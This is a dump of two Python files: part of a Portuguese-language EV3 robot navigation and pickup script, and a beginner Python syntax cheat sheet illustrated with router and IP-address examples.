if(atualE<40):
rodas.on_for_rotations(20,0,0.30)
rodas.on_for_rotations(0,20,0.35)
rodas.on_for_rotations(-30,-30,0.25)
if(atualD<40):
rodas.on_for_rotations(0,20,0.30)
rodas.on_for_rotations(20,0,0.35)
rodas.on_for_rotations(-30,-30,0.25)
def alinha(Kp,target,margem):
global d
erroE=1
erroD=1
if c == 'White':
atualE = Sensor_esquerda.rgb[0]+Sensor_esquerda.rgb[1]+Sensor_esquerda.rgb[2]
while c=='White' and atualE<280 :
rodas.on(15,15)
atualE = Sensor_esquerda.rgb[0]+Sensor_esquerda.rgb[1]+Sensor_esquerda.rgb[2]
rodas.off()
else:
atualE = Sensor_esquerda.rgb[0]+Sensor_esquerda.rgb[1]+Sensor_esquerda.rgb[2]
while c!='White' and atualE<280:
rodas.on(-15,-15)
atualE = Sensor_esquerda.rgb[0]+Sensor_esquerda.rgb[1]+Sensor_esquerda.rgb[2]
rodas.off()
over=time.time()
while(erroE != 0 or erroD != 0) :
naocaia_alinhar();
atualD = d[0]+d[1]+d[2]
erroD=atualD - target
if abs(erroD)<margem:
erroD=0
outputD = erroD* (Kp+0.01)
atualE = Sensor_esquerda.rgb[0]+Sensor_esquerda.rgb[1]+Sensor_esquerda.rgb[2]
erroE=atualE - target
if abs(erroE)<margem:
erroE=0
outputE = erroE* (Kp+0.008)
if outputE>40:
outputE = 40
elif outputE<-40:
outputE=-40
if outputD>40:
outputD = 40
if time.time()-over>10:
rodas.off()
erroE=0
erroD=0
if erroE == 0 and erroD == 0:
rodas.off()
else:
rodas.on(outputE,outputD)
while c!='White':
rodas.on(-20,-20)
time.sleep(0.1)
rodas.off()
def andar_frente():  # adjust all the timings in here before using the final robot and track
global cor_atual,tentativa,quads,c,plaza,memoria_cor
# Drives forward until it sees Black, returns the elapsed time
while 1:
# print(c)
if(c=='Black'):
rodas.off()
retorno()
return
elif c!='White' and c!='Black': # should be true for a new color other than black and white
#print(Corfimar_cor(c))
if(Confirmar_cor(c)):
verificar_plaza()
if(len(quads)>0 and plaza==False):memoria_cor[cor_atual]=orientacao
if(plaza==False):quads.append(c)
cor_atual=c
if cor_atual!='White' and cor_atual!='Black':  # 'and' so this only fires for an actual color square
print('ACHEI: ',cor_atual)
tentativa=0
rodas.off()
procurar_proximo()
alinha(0.01,245,15)
return
while c=='White':
# Drives over white looking for the passenger figure if the backpack is not loaded (mochila==0); otherwise it just keeps driving forward over white
procurar_passageiro()
def virar(graus):  # turning function relative to the current heading
# 0.666 is the turn time factor; tune it so the robot turns exactly 90 degrees, and adjust it again if the turning speed changes
if graus<0:
if c == 'Red':
rodas.on_for_rotations(-40,40,abs(graus)*(0.770/90))
else:
rodas.on_for_rotations(-40,40,abs(graus)*(0.683/90))
elif(graus==0): pass
else:
if c == 'Red':
rodas.on_for_rotations(40,-40,abs(graus)*(0.770/90))
else:
rodas.on_for_rotations(40,-40,abs(graus)*(0.683/90))#FROM HELL
def procurar_proximo():  # turns according to what has been learned, or the lack of it
global tentativa,cor_atual,orientacao
if (cor_atual not in memoria_cor.keys()):
if (tentativa == 0):
virar(90)
orientacao = 90
if (tentativa == 1):
virar(-90)
orientacao = 0
if (tentativa == 2):
virar(-90)
orientacao = -90
else:virar(memoria_cor[cor_atual])
# This function must handle 4 cases (whatever appears in the list below is what it should try, since it is unknown):
# 1: Right->Forward->Left (knows nothing)
# 2: Right->Left (knows forward/0)
# 3: Forward->Left (knows right/90)
# 4: Left (knows right/90 and forward/0)
# END OF LOCOMOTION FUNCTIONS
# COLOR FUNCTIONS
def media(leitura1, leitura2): # AVERAGES THE READINGS OF BOTH SENSORS
media = []
for x in range(3):
media.append((leitura1[x]+leitura2[x])/2)
return tuple(media)
def cor_mais_proxima(leitura):
global cores
min = 1000
for valor in cores.values():
# EUCLIDEAN DISTANCE BETWEEN THE SENSOR READING GIVEN AS INPUT AND THE PREVIOUSLY CALIBRATED COLOR VALUES
dist = sqrt(((leitura[0]-valor[0])**2) +
((leitura[1]-valor[1])**2)+((leitura[2]-valor[2])**2))
if(dist < min): # checks whether it is smaller than the last one checked
min = dist
for key, value in cores.items(): # gets the name of the color that produced the smallest distance
if value == valor:
cor = key
return cor
def diferente_de(*cor):
global c
if c not in cor:
return 1
else: return 0
def cor_th():
global c,d
while(1):
c=cor_mais_proxima(Sensor_direita.rgb)
d=Sensor_direita.rgb
def Confirmar_cor(cor_vista):
global c
time.sleep(0.2)
if(c==cor_vista):
cor_atual=c
return True
else:
atualD = d[0]+d[1]+d[2]
if atualD<80:
naocaia()
return False
# END OF COLOR FUNCTIONS
# PLAZA FUNCTIONS
def verificar_plaza():
global c, mochila, quad, cor_atual, plaza,velocidade
if(1):
if c!='Black':
mudanca = 0
cor_momento = c
goiaba = Thread(target=rodas.on_for_seconds, args=(-15, -15, 32.22/15,))  # 32.22 = time factor for it to reach the middle of the COLORED square
# If you change the speed of 15 (e.g. if it cannot climb the ramp), decrease this factor accordingly
goiaba.start()
while(goiaba.is_alive()):
#print("Checando plaza: ",mudanca)
if (cor_momento != c):
mudanca += 1
cor_momento = c
if(mudanca >= 2):
print("PLAZA")
pickle.dump(quads,open('memoria.p','wb'))  # Stores the squares seen, for future debugging
plaza=True  # Plaza found
quads.append(quad(cor_atual))  # puts the last square before the plaza into the array
tempo=time.time()
rodas.on(-30,-30)
while(c!='Black'):
rodas.on(-(SpeedPercent(velocidade)*1.35), -(SpeedPercent(velocidade)*1.35))
if(diferente_de('Black','White')):
if(Confirmar_cor(c)):
rodas.off()
return
if(plaza==True):
rodas.on(-25,-35)
time.sleep(3)
rodas.off()
time.sleep(49.5/SpeedPercent(velocidade))  # this delay lets it drive back past the plaza stripes; no need to change it
par=mochila
solte()  # drops off the passenger figure
mochila=False
rodas.on_for_seconds((SpeedPercent(velocidade)*1.35), (SpeedPercent(velocidade)*1.35), time.time()-tempo)
while(c=='White'):rodas.on(SpeedPercent(velocidade),SpeedPercent(velocidade))
rodas.on_for_seconds(SpeedPercent(velocidade), SpeedPercent(velocidade), 8/SpeedPercent(velocidade))
# 8 must be the same time factor used in retorno()
rodas.off()
if par==True:Mochila_sobe()
virar(180)
Volta()
else:pass
goiaba.join()
rodas.off()
def Volta():
global quads,mochila,start_time,c,velocidade
i=len(quads)-2  # index so the robot only goes as far as the last square
while(i>0 and mochila==False):  # if you want the robot to go all the way to the last one, remove the backpack condition
if c!='White':
print(memoria_cor[c])
virar((memoria_cor[c])*(-1))
alinha(0.01,245,15)
procurar_passageiro()
time.sleep(35.22/SpeedPercent(velocidade))  # Same time factor as in verificar_plaza (COLORED-square entry).
rodas.off()
if(mochila==True ):
virar(90)
virar(90)
alinha(0.01,245,15)
while(c!='White'):rodas.on(-SpeedPercent(velocidade),-SpeedPercent(velocidade))
rodas.off()
break
i-=1
# if the sensor detects something, return start_time and run the figure pickup function
if(i==0):
virar(90)
virar(90)
while(c!='White'):rodas.on(-SpeedPercent(velocidade),-SpeedPercent(velocidade))
rodas.off()
procurar_passageiro()
verificar_plaza()
# END OF PLAZA FUNCTIONS
def naocaia():
global d
atualD = d[0]+d[1]+d[2]
atualE = Sensor_esquerda.rgb[0]+Sensor_esquerda.rgb[1]+Sensor_esquerda.rgb[2]
if atualE< 40:
rodas.on(-SpeedPercent(velocidadeFrente+30), -SpeedPercent(velocidadeFrente-5))
if atualD< 40:
rodas.on(-SpeedPercent(velocidadeFrente-5), -SpeedPercent(velocidadeFrente+30))
# BACKPACK FUNCTIONS (EQUIPMENT FOR CAPTURING THE FIGURE)
def procurar_passageiro():
global mochila,c,velocidadeFrente
while c == 'White':
naocaia()
rodas.on(-SpeedPercent(velocidadeFrente), -SpeedPercent(velocidadeFrente+0.5))
# if Sensor_sonic.distance_centimeters<30 and mochila==0 :
# rodas.off()
# pega()
def Mochila_desce():
Mochila.on_for_rotations(SpeedPercent(20), 0.53)  # negative raises it
def Mochila_solta():
Mochila.on_for_rotations(SpeedPercent(20),0.25)
def Mochila_pega():
Mochila.on_for_rotations(SpeedPercent(-20), 0.25)
def Mochila_sobe():
Mochila.on_for_rotations(SpeedPercent(-20), 0.53)
def solte():
global mochila
rodas.off()
if(mochila==True):
Mochila_solta()
def pega():
global mochila
dist = Sensor_sonic.distance_centimeters
time.sleep(0.5)
rodas.off()
Mochila_desce()
virar(90)
time.sleep(1)
rodas.on_for_seconds(-20,-20,dist*0.05)  # tune this value so the robot actually grabs the figure
Mochila_pega()
time.sleep(1)
mochila=True
rodas.on_for_seconds(20,20,dist*0.05)
virar(-90)
rodas.off()
# END OF BACKPACK FUNCTIONS
# INFORMATION FUNCTIONS
class quad:  # object that stores information about a reference point that was found
def __init__(self,cor):
self.cor = cor
# self.tempo = tempo
# self.orientacao=orientacao
# END OF INFORMATION FUNCTIONS
print("Vamos comecar!", end=' \r')
if __name__=="__main__":
start_time=0
plaza = False
ver_cor = Thread(target=cor_th)
ver_cor.daemon=True
ver_cor.start()
time.sleep(0.5)
Mochila_sobe()
while (1):
andar_frente()
#print(c)
#procurar_passageiro()
#virar(-90)
#rodas.on_for_degrees(-40,-40,90)
#time.sleep(2)
#curva.on_for_degrees(50,40,40,660)
#time.sleep(0.3)
# if (tuts=0):  # if it sees Black, go back to the reference point it came from
# retorno()
# # if it sees a new reference point, update the memory for that color and add to the list the information about the newly discovered square and the last one linked to it
# if (tuts=1):
# print ('Achei: ',c)
# tentativa=0  # resets the attempts variable, indicating it is a new square
# if(plaza==False and len(quads)>0):
# memoria_cor[cor_atual]=orientacao
# quads.append(quad(cor_atual))
|
pythonexammples.py
|
input("Please enter the string you want to be printed out: ") #raw_input() in Python 2; input() in Python 3
#Saving the input to a variable
user_says = input("Please enter the string you want to be printed out: ")
#Defining a variable
my_var = 10 #type integer
my_var = "Hello" #type string
my_var = True #type boolean
#Strings - indexing
a = "Cisco Switch"
a.index("i")
#Strings - character count
a = "Cisco Switch"
a.count("i")
#Strings - finding a character
a = "Cisco Switch"
a.find("sco")
#Strings - converting the case
a = "Cisco Switch"
a.lower() #lowercase
a.upper() #uppercase
#Strings - checking whether the string starts with a character
a = "Cisco Switch"
a.startswith("C")
#Strings - checking whether the string ends with a character
a = "Cisco Switch"
a.endswith("h")
#Strings - removing a character from the beginning and the end of a string
a = " Cisco Switch "
a.strip() #remove whitespaces
b = "$$$Cisco Switch$$$"
b.strip("$") #remove a certain character
#Strings - removing all occurences of a character from a string
a = " Cisco Switch "
a.replace(" ", "") #replace each space character with the absence of any character
#Strings - splitting a string by specifying a delimiter; the result is a list
a = "Cisco,Juniper,HP,Avaya,Nortel" #the delimiter is a comma
a.split(",")
#Strings - inserting a character in between every two characters of the string / joining the characters by using a delimiter
a = "Cisco Switch"
"_".join(a)
#Additional methods (source: https://www.tutorialspoint.com/python3/python_strings.htm)
capitalize()
#Capitalizes first letter of string.
lstrip()
#Removes all leading whitespace in string.
rstrip()
#Removes all trailing whitespace of string.
swapcase()
#Inverts case for all letters in string.
title()
#Returns "titlecased" version of string, that is, all words begin with uppercase and the rest are lowercase.
isalnum()
#Returns true if string has at least 1 character and all characters are alphanumeric and false otherwise.
isalpha()
#Returns true if string has at least 1 character and all characters are alphabetic and false otherwise.
isdigit()
#Returns true if string contains only digits and false otherwise.
islower()
#Returns true if string has at least 1 cased character and all cased characters are in lowercase and false otherwise.
isnumeric()
#Returns true if a unicode string contains only numeric characters and false otherwise.
isspace()
#Returns true if string contains only whitespace characters and false otherwise.
istitle()
#Returns true if string is properly "titlecased" and false otherwise.
isupper()
#Returns true if string has at least one cased character and all cased characters are in uppercase and false otherwise.
#Strings - concatenating two or more strings
a = "Cisco"
b = "2691"
a + b
#Strings - repetition / multiplying a string
a = "Cisco"
a * 3
#Strings - checking if a character is or is not part of a string
a = "Cisco"
"o" in a
"b" not in a
#Strings - formatting v1
"Cisco model: %s, %d WAN slots, IOS %f" % ("2600XM", 2, 12.4)
"Cisco model: %s, %d WAN slots, IOS %.f" % ("2600XM", 2, 12.4)
"Cisco model: %s, %d WAN slots, IOS %.1f" % ("2600XM", 2, 12.4)
"Cisco model: %s, %d WAN slots, IOS %.2f" % ("2600XM", 2, 12.4)
#Strings - formatting v2
"Cisco model: {}, {} WAN slots, IOS {}".format("2600XM", 2, 12.4)
"Cisco model: {0}, {1} WAN slots, IOS {2}".format("2600XM", 2, 12.4)
#Strings - slicing
string1 = "O E2 10.110.8.9 [160/5] via 10.119.254.6, 0:01:00, Ethernet2"
string1[5:15] #slice starting at index 5 up to, but NOT including, index 15; so index 14 represents the last element in the slice
string1[5:] #slice starting at index 5 up to the end of the string
string1[:10] #slice starting at the beginning of the string up to, but NOT including, index 10
string1[:] #returns the entire string
string1[-1] #returns the last character in the string
string1[-2] #returns the second to last character in the string
string1[-9:-1] #extracts a certain substring using negative indexes
string1[-5:] #returns the last 5 characters in the string
string1[:-5] #returns the string minus its last 5 characters
string1[::2] #adds a third element called step; skips every second character of the string
string1[::-1] #returns string1's elements in reverse order
#Numbers
num1 = 10
num2 = 2.5
type(num1) #checking the type of this variable; integer
type(num2) #checking the type of this variable; float
#Numbers - math operations
1 + 2 #addition
2 - 1 #subtraction
4 / 2 #division
4 * 2 #multiplication
4 ** 2 #raising to a power
5 % 2 #modulo (this means finding out the remainder after division of one number by another)
#Numbers - float division vs. integer division (special case)
3 / 2 #float division; result is 1 in Python 2 and 1.5 in Python 3
3 // 2 #integer division; result is 1 in Python 2 and Python 3
#Numbers - order of evaluation in math operations
#Highest priority: raising to a power; Medium priority: division, multiplication and modulo; Low priority: addition and subtraction
100 - 5 ** 2 / 5 * 2 #1st: 5 ** 2, second: / then *, third - ; result is 90.0
#Numbers - conversion between numeric types
int(1.5) #result is 1
float(2) #result is 2.0
#Numbers - useful functions
abs(5) #the distance between the number in between parantheses and 0
abs(-5) #returns the same result as abs(5)
max(1, 2) #returns the largest number
min(1, 2) #returns the smallest number
pow(3, 2) #another way of raising to a power
#Booleans - logical operations
(1 == 1) and (2 == 2) #result is True; AND means that both operands should be True in order to get the expression evaluated as True
(1 == 1) or (2 == 2) #result is True; when using OR, it is enough if only one expression is True, in order to have True as the final result
not(1 == 1) #result is False; using the NOT operator means denying an expression, in this case denying a True expression
not(1 == 2) #result is True; using the NOT operator means denying an expression, in this case denying a False expression
None, 0, 0.0, 0j, empty string, empty list, empty tuple, empty dictionary #these values always evaluate to False (in Python 2 the long literal 0L is also falsy)
bool(None) #returns False; function that evaluates values and expressions
bool(0) #returns False; function that evaluates values and expressions
bool(2) #returns True; function that evaluates values and expressions
bool("router") #returns True; function that evaluates values and expressions
#Lists
list1 = ["Cisco", "Juniper", "Avaya", 10, 10.5, -11] #creating a list
len(list1) #returns the number of elements in the list
list1[0] #returns "Cisco" which is the first element in the list (index 0)
list1[0] = "HP" #replacing the first element in the list with another value
#Lists - methods
list2 = [-11, 2, 12]
min(list2) #returns the smallest element (value) in the list
max(list2) #returns the largest element (value) in the list
list1 = ["Cisco", "Juniper", "Avaya", 10, 10.5, -11]
list1.append(100) #appending a new element to the list
del list1[4] #removing an element from the list by index
list1.pop(0) #removing an element from the list by index
list1.remove("HP") #removing an element from the list by value
list1.insert(2, "Nortel") #inserting an element at a particular index
list1.extend(list2) #appending a list to another list
list1.index(-11) #returns the index of element -11
list1.count(10) #returns the number of times element 10 is in the list
list2 = [9, 99, 999, 1, 25, 500]
list2.sort() #sorts the list elements in ascending order; modifies the list in place
list2.reverse() #sorts the list elements in descending order; modifies the list in place
sorted(list2) #sorts the elements of a list in ascending order and creates a new list at the same time
sorted(list2, reverse = True) #sorts the elements of a list in descending order and creates a new list at the same time
list1 + list2 #concatenating two lists
list1 * 3 #repetition of a list
#Lists - slicing (works the same as string slicing, but with list elements instead of string characters)
a_list[5:15] #slice starting at index 5 up to, but NOT including, index 15; so index 14 represents the last element in the slice
a_list[5:] #slice starting at index 5 up to the end of the list
a_list[:10] #slice starting at the beginning of the list up to, but NOT including, index 10
a_list[:] #returns the entire list
a_list[-1] #returns the last element in the list
a_list[-2] #returns the second to last element in the list
a_list[-9:-1] #extracts a certain sublist using negative indexes
a_list[-5:] #returns the last 5 elements in the list
a_list[:-5] #returns the list minus its last 5 elements
a_list[::2] #adds a third element called step; skips every second element of the list
a_list[::-1] #returns a_list's elements in reverse order
#Sets - unordered collections of unique elements
set1 = {"1.1.1.1", "2.2.2.2", "3.3.3.3", "4.4.4.4"} #creating a set
list1 = [11, 12, 13, 14, 15, 15, 15, 11]
string1 = "aaabcdeeefgg"
set1 = set(list1) #creating a set from a list; removing duplicate elements; returns {11, 12, 13, 14, 15}
set2 = set(string1) #creating a set from a string; removing duplicate characters; returns {'b', 'a', 'g', 'f', 'c', 'd', 'e'}; remember that sets are UNORDERED collections of elements
len(set1) #returns the number of elements in the set
11 in set1 #returns True; checking if a value is an element of a set
10 not in set1 #returns True; checking if a value is NOT an element of a set
set1.add(16) #adding an element to a set
set1.remove(16) #removing an element from a set
#Frozensets - immutable sets. The elements of a frozenset remain the same after creation.
fs1 = frozenset(list1) #defining a frozenset
fs1
frozenset({11, 12, 13, 14, 15}) #the result
type(fs1)
<class 'frozenset'> #the result
#proving that frozensets are indeed immutable
fs1.add(10)
AttributeError: 'frozenset' object has no attribute 'add'
fs1.remove(1)
AttributeError: 'frozenset' object has no attribute 'remove'
fs1.pop()
AttributeError: 'frozenset' object has no attribute 'pop'
fs1.clear()
AttributeError: 'frozenset' object has no attribute 'clear'
#Sets - methods
set1.intersection(set2) #returns the common elements of the two sets
set1.difference(set2) #returns the elements that set1 has and set2 doesn't
set1.union(set2) #unifying two sets; the result is also a set, so there are no duplicate elements; not to be confused with concatenation
set1.pop() #removes a random element from the set; set elements cannot be removed by index because sets are UNORDERED collections of elements, so there are no indexes to use
set1.clear() #clearing a set; the result is an empty set
#Tuples - immutable lists (their contents cannot be changed by adding, removing or replacing elements)
my_tuple = () #creating an empty tuple
my_tuple = (9,) #creating a tuple with a single element; DO NOT forget the comma
my_tuple = (1, 2, 3, 4)
#Tuples - the same indexing & slicing rules apply as for strings and lists
len(my_tuple) #returns the number of elements in the tuple
my_tuple[0] #returns the first element in the tuple (index 0)
my_tuple[-1] #returns the last element in the tuple (index -1)
my_tuple[0:2] #returns (1, 2)
my_tuple[:2] #returns (1, 2)
my_tuple[1:] #returns (2, 3, 4)
my_tuple[:] #returns (1, 2, 3, 4)
my_tuple[:-2] #returns (1, 2)
my_tuple[-2:] #returns (3, 4)
my_tuple[::-1] #returns (4, 3, 2, 1)
my_tuple[::2] #returns (1, 3)
#Tuples - tuple assignment / packing and unpacking
tuple1 = ("Cisco", "2600", "12.4")
(vendor, model, ios) = tuple1 #vendor will be mapped to "Cisco" and so are the rest of the elements with their corresponding values; both tuples should have the same number of elements
(a, b, c) = (1, 2, 3) #assigning values in a tuple to variables in another tuple
min(tuple1) #returns "12.4"
max(tuple1) #returns "Cisco"
tuple1 + (5, 6, 7) #tuple concatenation
tuple1 * 20 #tuple multiplication
"2600" in tuple1 #returns True
784 not in tuple1 #returns True
del tuple1 #deleting a tuple
#Ranges - unlike in Python 2, where the range() function returned a list, in Python 3 it returns a lazy range object; use list() to see all of its values at once
r = range(10) #defining a range
r
range(0, 10) #the result
type(r)
<class 'range'> #the result
list(r) #converting a range to a list
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9] #the result
list(r)[2:5] #slicing a range by using the list() function first
[2, 3, 4] #the result
#Dictionaries - a dictionary is an unordered set of key-value pairs
dict1 = {} #creating an empty dictionary
dict1 = {"Vendor": "Cisco", "Model": "2600", "IOS": "12.4", "Ports": "4"}
dict1["IOS"] #returns "12.4"; extracting a value for a specified key
dict1["IOS"] = "12.3" #modifies an existing key-value pair
dict1["RAM"] = "128" #adds a new key-value pair to the dictionary
del dict1["Ports"] #deleting a key-value pair from the dictionary
len(dict1) #returns the number of key-value pairs in the dictionary
"IOS" in dict1 #verifies if "IOS" is a key in the dictionary
"IOS2" not in dict1 #verifies if "IOS2" is not a key in the dictionary
#Dictionaries - methods
dict1.keys() #returns the keys in the dictionary (a list in Python 2, a view object in Python 3)
dict1.values() #returns the values in the dictionary (a list in Python 2, a view object in Python 3)
dict1.items() #returns the key-value pairs as tuples (a list of tuples in Python 2, a view object in Python 3)
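#Added illustration (a quick sketch, not part of the original list): looping over the dict1 defined above with items()
for key, value in dict1.items():
    print(key, "->", value) #prints each key-value pair, e.g. "Vendor -> Cisco"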
#Conversions between data types
str() #converting to a string
int() #converting to an integer
float() #converting to a float
list() #converting to a list
tuple() #converting to a tuple
set() #converting to a set
bin() #converting to a binary representation
hex() #converting to a hexadecimal representation
int(variable, 2) #converting from binary back to decimal
int(variable, 16) #converting from hexadecimal back to decimal
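#Added illustration (a small sketch, not part of the original list): round-tripping a decimal number through its binary and hexadecimal representations
num = 37
b = bin(num) #'0b100101'
h = hex(num) #'0x25'
int(b, 2) #back to 37
int(h, 16) #back to 37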
#If / Elif / Else conditionals - executing code based on one or more conditions being evaluated as True or False; the "elif" and "else" clauses are optional
x = 5
if x > 5: #if the "x > 5" expression is evaluated as True, the code indented under the "if" clause gets executed, otherwise the execution jumps to the "elif" clause...
print("x is greater than 5")
elif x == 5: #...if the "x == 5" expression is evaluated as True, the code indented under the "elif" clause gets executed, otherwise the execution jumps to the "else" clause
print("x IS 5")
else: #this covers all situations not covered by the "if" and "elif" clauses; the "else" clause, if present, is always the last clause in the code block
print("x is NOT greater than 5" )
#result of the above "if" block
x IS 5
#For / For Else loops - executes a block of code a number of times, depending on the sequence it iterates on; the "else" clause is optional
vendors = ["Cisco", "HP", "Nortel", "Avaya", "Juniper"]
for element in vendors: #iterating over a sequence and executing the code indented under the "for" clause for each element in the sequence
print(element)
else: #the indented code below "else" will be executed when "for" has finished looping over the entire list
print("The end of the list has been reached")
#result of the above "for" block
Cisco
HP
Nortel
Avaya
Juniper
The end of the list has been reached
#While / While Else loops - a while loop executes as long as an user-specified condition is evaluated as True; the "else" clause is optional
x = 1
while x <= 10:
print(x)
x += 1
else:
print("Out of the while loop. x is now greater than 10")
#result of the above "while" block
1 2 3 4 5 6 7 8 9 10
Out of the while loop. x is now greater than 10
#If / For / While Nesting
x = "Cisco"
if "i" in x:
if len(x) > 3: #if nesting
print(x, len(x))
Cisco 5 #result of the above block
list1 = [4, 5, 6]
list2 = [10, 20, 30]
for i in list1:
for j in list2: #for nesting
print(i*j)
10 20 30 20 40 60 30 60 90 #result of the above block
x = 1
while x <= 10:
z = 5
x += 1
while z <= 10: #while nesting
print(z)
z += 1
5 6 7 8 9 10 5 6 7 8 9 10 5 6 7 8 9 10 5 6 7 8 9 10 5 6 7 8 9 10 5 6 7 8 9 10 5 6 7 8 9 10 5 6 7 8 9 10 5 6 7 8 9 10 5 6 7 8 9 10 #result of the above block
for number in range(10):
if 5 <= number <= 9: #mixed nesting
print(number)
5 6 7 8 9 #result of the above block
#Break, Continue, Pass
list1 = [4, 5, 6]
list2 = [10, 20, 30]
for i in list1:
for j in list2:
if j == 20:
break #stops the execution here, ignores the print statement below and completely quits THIS "for" loop; however, it doesn't quit the outer "for" loop, too!
print(i * j)
print("Outside the nested loop")
#result of the above block
40
Outside the nested loop
50
Outside the nested loop
60
Outside the nested loop
list1 = [4, 5, 6]
list2 = [10, 20, 30]
for i in list1:
for j in list2:
if j == 20:
continue #ignores the rest of the code below for the current iteration, then goes up to the top of the loop (inner "for") and starts the next iteration
print(i * j)
print("Outside the nested loop")
#result of the above block
40
120
Outside the nested loop
50
150
Outside the nested loop
60
180
Outside the nested loop
for i in range(10):
pass #pass is the equivalent of "do nothing"; it is actually a placeholder for a piece of code that you will fill in later
#Try / Except / Else / Finally - handling an exception when it occurs and telling Python to keep executing the rest of the lines of code in the program
try:
print(4/0) #in the "try" clause you insert the code that you think might generate an exception at some point
except ZeroDivisionError:
print("Division Error!") #specifying what exception types Python should expect as a consequence of running the code inside the "try" block and how to handle them
else:
print("No exceptions raised by the try block!") #executed if the code inside the "try" block raises NO exceptions
finally:
print("I don't care if an exception was raised or not!") #executed whether the code inside the "try" block raises an exception or not
#result of the above block
Division Error!
I don't care if an exception was raised or not!
#Functions - Basics
def my_first_function(x, y): #defining a function that takes two parameters
sum = x + y
return sum #this statement is used to exit a function and return something when the function is called
my_first_function(1, 2) #calling a function and passing two POSITIONAL arguments, the values of 1 and 2; result is 3
my_first_function(x = 1, y = 2) #calling a function and passing two KEYWORD arguments, the values of 1 and 2; result is 3
my_first_function(1, y = 2) #calling a function and passing mixed types of arguments, the values of 1 and 2; result is 3; rule: positional arguments always before keyword arguments!
def my_first_function(x, y, z = 3): #specifying a default parameter value in a function definition
def my_first_function(x, *args) #specifying a variable number of positional parameters in a function definition; args is a tuple
def my_first_function(x, **kwargs) #specifying a variable number of keyword parameters in a function definition; kwargs is a dictionary
global my_var #"importing" a variable in the global namespace to the local namespace of a function
#Modules and importing - Basics
import sys #importing the sys module; the import statements should be placed before any other code in your application
from math import pi #importing only a variable (pi) from the math module
from math import sin #importing only a function (sin()) from the math module; there's no need to add the parantheses of the function when importing it
from math import * #importing all the names (variables and functions) from the math module
#Files - opening and reading a file
myfile = open("routers.txt", "r") #"r" is the file access mode for reading and it is the default mode when opening a file
myfile.mode #checking the mode in which a file has been opened
myfile.read() #method that returns the entire content of a file in the form of a string
myfile.read(5) #returning only the first 5 characters (bytes) in the file
myfile.seek(0) #moving the cursor at the beginning of the file
myfile.tell() #checking the current position of the cursor inside the file
myfile.readline() #returns the file content one line at a time, each time you use the method
myfile.readlines() #returns a list where each element is a line in the file
#Files - writing and appending to a file
newfile = open("newfile.txt", "w") #opens/creates a new file for writing; the "w" method also creates the file for writing if the file doesn’t exist and overrides the file if the file already exists; remember to close the file after writing to it to save the changes!
newfile.writelines(["Cisco", "Juniper", "HP", "\n"]) #this method takes a sequence of strings as an argument and writes those strings to the file
newfile = open("newfile.txt", "a") #opening a file for appending
newfile = open("newfile.txt", "w+") #opens a file for both writing and reading at the same time
newfile = open("newfile.txt", "x") #opens for exclusive creation, failing if the file already exists
#Files - closing a file
newfile.closed #checking if a file is closed
newfile.close() #closing a file
with open("python.txt", "w") as f: #using the with-as solution, the files gets closed automatically, without needing the close() method
f.write("Hello Python!\n")
#Regular Expressions - the "re.match" and "re.search" methods
a = re.match(pattern, string, optional flags) #general match syntax; "a" is called a match object if the pattern is found in the string, otherwise "a" will be None
mystr = "You can learn any programming language, whether it is Python2, Python3, Perl, Java, javascript or PHP."
import re #importing the regular expressions module
a = re.match("You", mystr) #checking if the characters "You" are indeed at the beginning of the string
a.group() #result is 'You'; Python returns the match it found in the string according to the pattern we provided
a = re.match("you", mystr, re.I) #re.I is a flag that ignores the case of the matched characters
a = re.search(pattern, string, optional flags) #general search syntax; searching for a pattern throughout the entire string; will return a match object if the pattern is found and None if it's not found
arp = "22.22.22.1 0 b4:a9:5a:ff:c8:45 VLAN#222 L"
a = re.search(r"(.+?) +(\d) +(.+?)\s{2,}(\w)*", arp) #result is '22.22.22.1'; 'r' means the pattern should be treated like a raw string; any pair of parentheses indicates the start and the end of a group; if a match is found for the pattern inside the parentheses, then the contents of that group can be extracted with the group() method applied to the match object; in regex syntax, a dot represents any character, except a new line character; the plus sign means that the previous expression, which in our case is just a dot, may repeat one or more times; the question mark matching as few characters as possible
a.groups() #returns all matches found in a given string, in the form of a tuple, where each match is an element of that tuple
('22.22.22.1', '0', 'b4:a9:5a:ff:c8:45 VLAN#222', 'L')
#Regular Expressions - the "re.findall" and "re.sub" methods
a = re.findall(r"\d\d\.\d{2}\.[0-9][0-9]\.[0-9]{1,3}", arp) #returns a list where each element is a pattern that was matched inside the target string
['22.22.22.1'] #result of the above operation - a list with only one element, the IP address matched by the regex
b = re.sub(r"\d", "7", arp) #replaces all occurrences of the specified pattern in the target string with a string you enter as an argument
'77.77.77.7 7 b7:a7:7a:ff:c7:77 VLAN#777 L' #result of the above operation
#Classes and objects
class MyRouter(object): #creating a class which inherits from the default "object" class
def __init__(self, routername, model, serialno, ios): #class constructor; initializing some variables and the method is called whenever you create a new instance of the class
self.routername = routername #"self" is a reference to the current instance of the class
self.model = model
self.serialno = serialno
self.ios = ios
def print_router(self, manuf_date):
print("The router name is: ", self.routername)
print("The router model is: ", self.model)
print("The serial number of: ", self.serialno)
print("The IOS version is: ", self.ios)
print("The model and date combined: ", self.model + manuf_date)
router1 = MyRouter('R1', '2600', '123456', '12.4') #creating an object by simply calling the class name and entering the arguments required by the __init__ method in between parentheses
router1.model #accessing the object's attributes; result is '2600'
router1.print_router("20150101") #accessing a function (actually called method) from within the class
The router name is: R1
The router model is: 2600
The serial number of: 123456
The IOS version is: 12.4
The model and date combined: 260020150101
getattr(router2, "ios") #getting the value of an attribute
setattr(router2, "ios", "12.1") #setting the value of an attribute
hasattr(router2, "ios") #checking if an object attribute exists
delattr(router2, "ios") #deleting an attribute
isinstance(router2, MyRouter) #verifying if an object is an instance of a particular class
class MyNewRouter(MyRouter): #creating a new class (child) inheriting from the MyRouter parent class
...
issubclass(MyNewRouter, MyRouter) #returns True or False; checking if a class is the child of another class
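#Added illustration (a minimal sketch of what the child class might contain; the method below is made up, not part of the original example)
class MyNewRouter(MyRouter):
    def print_short(self):
        print(self.routername, self.model) #attributes inherited from MyRouter's __init__
router3 = MyNewRouter('R3', '2691', '654321', '12.4') #the inherited constructor still takes the same four arguments
router3.print_short() #prints: R3 2691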
#List / Set / Dictionary comprehensions
#Instead of...
list1 = []
for i in range(10):
j = i ** 2
list1.append(j)
#...we can use a list comprehension
list2 = [x ** 2 for x in range(10)]
list3 = [x ** 2 for x in range(10) if x > 5] #with a conditional statement
set1 = {x ** 2 for x in range(10)} #set comprehension
dict1 = {x: x * 2 for x in range(10)} #dictionary comprehension
#Lambda functions - anonymous functions
